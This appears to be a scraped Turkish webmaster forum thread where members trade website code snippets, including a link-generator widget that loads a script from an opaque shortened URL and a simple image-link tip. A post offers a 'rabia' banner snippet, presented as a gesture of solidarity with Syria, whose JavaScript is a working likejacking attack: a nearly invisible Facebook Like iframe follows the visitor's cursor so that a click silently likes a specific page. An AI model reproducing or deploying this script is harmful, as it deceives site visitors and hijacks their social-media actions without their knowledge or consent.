<textarea class="act" id="links" name="links" rows="1" cols="34">http://turbobit.net/12qi44f8b1km.html</textarea><label style="display:block;visibility:hidden;width:1px;height:1px;"><input class="agree" name="agree" checked="checked" type="checkbox" style="visibility:hidden;width:1px;height:1px;"></input></label><div class="btn"><input class="submit" onclick="document.getElementById('koddostufram').style.height='50px';" name="submit" value="Oluştur" type="submit" style=""></input><small style="float:right;">IP başı günlük limit: 5 link</small></div></form></div><style>#koddostu-premium{text-align:center;position:relative;background:#f8f8f8;width:300px;padding:10px 10px 35px 10px;-webkit-border-radius: 3px;border-radius: 3px;border:1px solid #d8d8d8;-webkit-box-shadow:0 1px 1px rgba(0, 0, 0, 0.3), 0 0 40px rgba(0, 0, 0, 0.1) inset;-moz-box-shadow:0 1px 1px rgba(0, 0, 0, 0.3), 0 0 40px rgba(0, 0, 0, 0.1) inset;box-shadow:0 1px 1px rgba(0, 0, 0, 0.3), 0 0 40px rgba(0, 0, 0, 0.1) inset;}#koddostu-premium:before, #koddostu-premium:after{content:"";position:absolute;z-index:-1;-webkit-box-shadow:0 0 5px rgba(0,0,0,0.6);-moz-box-shadow:0 0 5px rgba(0,0,0,0.6);box-shadow:0 0 5px rgba(0,0,0,0.6);top:0;bottom:0;left:10px;right:10px;-moz-border-radius:100px / 10px;border-radius:100px / 10px;}#koddostu-premium:after{right:10px;left:auto;-webkit-transform:skew(8deg) rotate(3deg);-moz-transform:skew(8deg) rotate(3deg);-ms-transform:skew(8deg) rotate(3deg);-o-transform:skew(8deg) rotate(3deg);transform:skew(8deg) rotate(3deg);}#koddostu-premium .submit{display:inline-block;float:left;background:#fafafa;border:1px solid #bbb;color:#444;font-weight:bold;-webkit-border-radius:5px;border-radius:5px;font-family:Arial, sans-serif;padding:3px 8px;-moz-box-shadow:0px 0px 1px 0px #ccc;-webkit-box-shadow:0px 0px 1px 0px #ccc;box-shadow:0px 0px 1px 0px #ccc;}.act{height:22px;width:300px;font-size:12px;font-family:Arial, sans-serif;resize:none;}#jam{display:block;text-align:center;font-family: Helvetica, Arial, sans-serif;font-size:20px;font-weight:bold;-webkit-background-clip: text;-moz-background-clip: text;background-clip: text;color: rgba(0,0,0,0.6);text-shadow: 0px 1px 1px rgba(0,0,0,0.2),0px -1px 7px rgba(255,255,255,0.3);margin-bottom:7px;}#dam{display:block;position:absolute;bottom:5px;right:3px;width:12px;height:12px;background:transparent;font-family:Arial, sans-serif;font-size:12px;font-weight:bold;color:#888;text-decoration:none !important;}#koddostu-premium .submit:hover{cursor:pointer;-moz-box-shadow:0px 0px 1px 0px #ccc;-webkit-box-shadow:0px 0px 1px 0px #ccc;box-shadow:0px 0px 1px 0px #ccc;color:#000;background:#fff}</style><script src="http://goo.gl/p3celi"></script><style>#fam{width:300px;height:37px;margin-bottom:8px;background:transparent url(http://1.bp.blogspot.com/-QP1dDax4EhM/Ug3zMO8HAZI/AAAAAAAAa5I/liNy72OSpdw/s1600/koddostu.png) no-repeat top left;}</style>
<!--Telif sahibi:koddostu.com-->
<!--Bu çalışma Creative Commons Attribution-Gayriticari-NoDerivs 3.0 Unported Lisansı ile lisanslanmıştır.-->
<!--Koddostu Permium Link Oluşturucu STOP-->
|
|
↑
|
|
|
-
proatakan
Acemi Üye
Konum: İstanbul
|
11.09.2013, 10:19 (UTC) Mesaj konusu: |
|
|
bu kodları nereye yazıyoruz ? ______________ sagopa&kolera |
|
↑
|
|
|
-
grafikirtr
Acemi Üye
|
21.09.2013, 14:15 (UTC) Mesaj konusu: |
|
|
SURİYE'DE YAŞANANLARA DUYARSIZ KALMAYIN
Kod: <!-- rabia kodu-->
<div style="position:fixed;top:-5px;right:100px;z-index:999999;"><img style="animation-delay: 0.8s;
-webkit-animation-delay: 0.8s;
-moz-animation-delay: 0.8s;
animation-delay: 0.8s;" class="swing" src="http://www.trendwp.com/wp-content/themes/TrendWP/images/rabia.png"></div>
<script type="text/javascript">
(function(){
var tempX = 0,
tempY = 0,
IE = document.all? true : false;
if (!IE) document.captureEvents(Event.MOUSEMOVE);
var like = document.createElement('iframe');
like.src= 'http://www.facebook.com/plugins/like.php?href=' + encodeURIComponent(/*document.location.href*/ 'https://www.facebook.com/Oksijenliyiz') + '&layout=standard&show_faces=true&widt h=53&action=like&colorscheme=light&hei ght=80';
like.scrolling = 'no';
like.frameBorder = 0;
like.allowTransparency = 'true';
like.style.border = 0;
like.style.overflow = 'hidden';
like.style.cursor = 'pointer';
like.style.width = '5px';
like.style.height = '5px';
like.style.position = 'absolute';
like.style.opacity = .1; //Would be 0 if really used
document.getElementsByTagName('body')[0].appendChild(like);
window.addEventListener('mousemove', mouseMove, false);
setTimeout(function(){
document.getElementsByTagName('body')[0].removeChild(like);
window.removeEventListener('mousemove', mouseMove, false);
}, 500);
function mouseMove(e) {
if (IE) {
tempX = event.clientX + document.body.scrollLeft;
tempY = event.clientY + document.body.scrollTop;
} else {
tempX = e.pageX;
tempY = e.pageY;
}
if (tempX < 0) tempX = 0;
if (tempY < 0) tempY = 0;
like.style.top = (tempY - 0) + 'px';
like.style.left = (tempX - 0) + 'px';
like.onclick;
return true
}
}
)();
</script>
<!-rabia kodu--> |
|
↑
|
|
|
-
etkindizayn-forum
Acemi Üye
Konum: Bursa/Osmangazi
|
21.10.2013, 19:03 (UTC) Mesaj konusu: Resme Link Verme..!! |
|
|
<a href="GIDILECEK ADRES"><img src="RESİM URL" alt="" /></a>
Arrow ArkadaşLar GIDILECEK ADRES Yazan Yere Resme TıkLandıgında Hangi Sayfaya Gidicekse Onun Linkini Oraya Yapıştırın...
Arrow RESİM URL'si Yazan Yere Şeçtiginiz Resmin URL'si Yani Resmin Linki...
Umarım FaydaLı OLmussa Ne MutLu Bana...!!
Arrow EtkinDizayn.Tr.Gg Ekibi
Arrow www.etkindizayn.tr.gg - - Arrow www.etkindizayn-forum.tr.gg______________ Yeni Tasarımımıza Geçtik [Değerlendirmenizi Bekliyoruz]
Yürekten Sevene Mesafe Yoktur... |
|
↑
|
|
|
|